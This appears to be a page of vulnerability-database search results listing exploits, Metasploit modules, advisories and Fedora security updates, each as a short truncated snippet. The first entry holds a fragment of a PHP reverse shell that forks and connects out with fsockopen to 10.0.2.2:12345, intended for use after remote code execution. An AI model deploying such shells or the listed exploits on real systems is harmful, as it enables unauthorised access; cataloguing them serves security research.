PHP reverse eval shell

Сделан для прокидывания через RCE при ограничениях exec и подобному. Использует только fsockopen и eval Форкается если есть pcntlfork PHP код: settimelimit0; if functionexistspcntlfork $pid = pcntlfork; if$pid==1 exit1; if$pid exit0; ifposixsetsid==1 exit1; $sock = fsockopen'10.0.2.2',12345,...

Interactive Data eSignal Listener Buffer Overflow - Ver2 (CVE-2004-1868)

eSignal is a real-time market data and support tool provided by Interactive Data Corporation. The product supplies financial market data and more for traders over the internet. To facilitate the receipt of incoming data, eSignal opens a local, listening socket on TCP Port 80. There exists a buffe...

[SECURITY] Fedora 21 Update: mapserver-6.2.2-1.fc21

Mapserver is an internet mapping program that converts GIS data to map images in real time. With appropriate interface pages, Mapserver can provide an interactive internet map based on custom GIS data...

MySQL Login Utility

This module simply queries the MySQL instance for a specific user/pass default is root with blank. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'metasploit/framework/credentialcollection' require...

CapTipper - Malicious HTTP traffic explorer tool

CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic. CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations...

Hex-Rays IDA Pro Buffer Overflow Vulnerability

Hex-Rays IDA Pro is a set of static decompiler software from Hex-Rays Belgium. A buffer overflow vulnerability exists in Hex-Rays IDA Pro versions prior to 6.6 cumulative fix 2014-12-24, no detailed vulnerability details are provided at this time...

Nagios-history.cgi-Exec-Code

CVE-2012-6096 - Nagios history.cgi Remote Command Execution Another year, another reincarnation of classic and trivial bugs to exploit. This time we attack Nagios.. or more specifically, one of its CGI scripts. !/usr/bin/python CVE-2012-6096 - Nagios history.cgi Remote Command Execution...

TennisConnect 9.927 Cross Site Scripting

CVE-2014-8490 TennisConnect COMPONENTS System XSS Cross-Site Scripting Security Vulnerability Exploit Title: TennisConnect "TennisConnect COMPONENTS System" /index.cfm pid Parameter XSS Product: TennisConnect COMPONENTS System Vendor: TennisConnect Vulnerable Versions: 9.927 Tested Version: 9.927...

Arris Touchstone TG862G/CT Cross Site Request Forgery

----------- Vendor: ----------- Arris Interactive, LLC http://www.arrisi.com/ ISP: Comcast Xfinity ----------------------------------------- Affected Products/Versions: ----------------------------------------- HW: Arris Touchstone TG862G/CT Xfinity branded SW: Version 7.6.59S.CT Tested...

Arris Touchstone TG862G/CT Cross Site Scripting

----------- Vendor: ----------- Arris Interactive, LLC http://www.arrisi.com/ ISP: Comcast Xfinity ----------------------------------------- Affected Products/Versions: ----------------------------------------- HW: Arris Touchstone TG862G/CT Xfinity branded SW: Version 7.6.59S.CT Tested...

Adobe Flash Player: Multiple vulnerabilities

Background The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Description Multiple vulnerabilities have been discovered in Adobe Flash Player. Please review the CVE identifiers referenced below for details. Impact A remote attacke...

Important: Red Hat Security Advisory: bash Shift_JIS security update

Updated bash ShiftJIS packages that fix one security issue are now available for Red Hat Enterprise Linux 5.9 Extended Update Support. Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System CVSS base score, which gives a detailed...

Website Traffic Visualization: Logstalgia

Website Traffic Visualization Logstalgia is a website traffic visualization that replays or streams web-server access logs as a pong-like battle between the web server and an never ending torrent of requests. Requests appear as colored balls the same color as the host which travel across the scre...

[SECURITY] Fedora 21 Update: mksh-50c-1.fc21

mksh is the MirBSD enhanced version of the Public Domain Korn shell pdksh, a bourne-compatible shell which is largely similar to the original AT&T Korn shell. It includes bug fixes and feature improvements in order to produce a modern, robust shell good for interactive and especially script use,...

[SECURITY] Fedora 19 Update: mksh-50c-1.fc19

mksh is the MirBSD enhanced version of the Public Domain Korn shell pdksh, a bourne-compatible shell which is largely similar to the original AT&T Korn shell. It includes bug fixes and feature improvements in order to produce a modern, robust shell good for interactive and especially script use,...

[SECURITY] Fedora 20 Update: step-4.14.1-1.fc20

Interactive Physics Simulator...

[SECURITY] Fedora 20 Update: superkaramba-4.14.1-1.fc20

SuperKaramba is a tool that allows you to easily create interactive widgets on your KDE desktop...

[SECURITY] Fedora 20 Update: kqtquickcharts-4.14.1-1.fc20

A QtQuick plugin to render beautiful and interactive charts...

[SECURITY] Fedora 20 Update: kig-4.14.1-1.fc20

Interactive Geometry...

7T Interactive Graphical SCADA System 'dc.exe' Command Injection Vulnerability

7T Interactive Graphical SCADA System is prone to a remote command execution RCE vulnerability. SPDX-FileCopyrightText: 2014 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...